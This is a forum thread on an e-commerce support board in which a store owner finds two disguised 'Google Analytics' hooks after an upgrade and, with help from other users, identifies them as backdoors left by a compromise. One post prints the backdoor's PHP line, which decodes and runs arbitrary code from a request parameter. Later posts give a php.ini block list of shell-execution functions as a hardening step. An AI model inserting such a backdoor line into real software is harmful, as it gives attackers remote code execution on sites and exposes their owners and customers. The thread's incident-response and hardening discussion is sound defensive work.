jbranscum Posted May 13, 2017 Share Posted May 13, 2017 (edited) Hello all I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither but I have a nagging sense that these two hooks I'm seeing may not be part of CC. To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding. They were enabled after the update but I have since disabled them. Thoughts? By the way; v6 runs very well on nginx with a few tweaks. EDIT: Nevermind; I've answered my own question. I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents". No way of getting a time period on when they were added so its hard to know if they were present for two weeks or two years. There is a lot of file manipulation in the decoded script so I'm going to go with 'compromised site'. Edited May 13, 2017 by jbranscum derp so hard Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted May 13, 2017 Share Posted May 13, 2017 They look extremely suspect to me and I would say 100% that your store has been compromised. Google Analytics doesnt need any hooks and the naming is to try and persuade you that they are legit. You need to remove them completely (delete from admin and remove the file itself) however what you could also do is base64_decode that code to see exactly what it was doing - chances are that other areas of the store / files are compromised (adding hooks like that is done for a reason) Ian Quote Link to comment Share on other sites More sharing options...
jbranscum Posted May 13, 2017 Author Share Posted May 13, 2017 Both hooks are identical; the first is a very simple decode that does a lot of file manipulation. The second one I don't have enough php wits to crack: $f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/='))); Something about replacing a newline but the rest doesn't make much sense in context. Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted May 13, 2017 Share Posted May 13, 2017 The only safe thing to do is to assume that your store is compromised and after completely removing the hooks (database and actual file which incidentally would give you an idea when they were uploaded) you will need to clean the store - a re-upload of all 6.1.7 files again is a good start and then a visual inspection of all files and directories is belt and braces Ian Quote Link to comment Share on other sites More sharing options...
jbranscum Posted May 13, 2017 Author Share Posted May 13, 2017 Thanks for pointing out that there would be an associated file; May 13 2016. Quite the coincidence that I'd happen to find the exploits exactly one year later. Unfortunately I don't have the apache logs from that time to review what was done. Thanks again for the help. Quote Link to comment Share on other sites More sharing options...
jbranscum Posted May 13, 2017 Author Share Posted May 13, 2017 One more reply for anyone that is looking to secure their php installation in the future; add the following to your php.ini file: disable_functions =exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec; Quote Link to comment Share on other sites More sharing options...
bsmither Posted May 13, 2017 Share Posted May 13, 2017 There are a few older versions of CubeCart that have a vulnerability. (I would hope that these versions are not available for download from CubeCart's download center, or if they are, the vulnerability has been patched in those packages.) Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted May 14, 2017 Share Posted May 14, 2017 16 hours ago, jbranscum said: One more reply for anyone that is looking to secure their php installation in the future; add the following to your php.ini file: disable_functions =exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec; If it is your own dedicated server then that is good advice (although the list of functions included is up for debate and we block a couple more and if you are drastic, you can block 40 plus) but if like most on here, you are on a shared server and your hosting company hasn't even added this simply precaution, then you should question their commitment to security of your website 15 hours ago, bsmither said: There are a few older versions of CubeCart that have a vulnerability. (I would hope that these versions are not available for download from CubeCart's download center, or if they are, the vulnerability has been patched in those packages.) All previous versions are available and are as they were originally released (I don't know any software package that would back patch all previous versions and why would you ?) but maybe @Al Brookbanks should add a very large bold red warning on the downloads page to only ever download and run the latest version as that has the most up to date security patches but then again surely tat is common sense ?! Ian Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.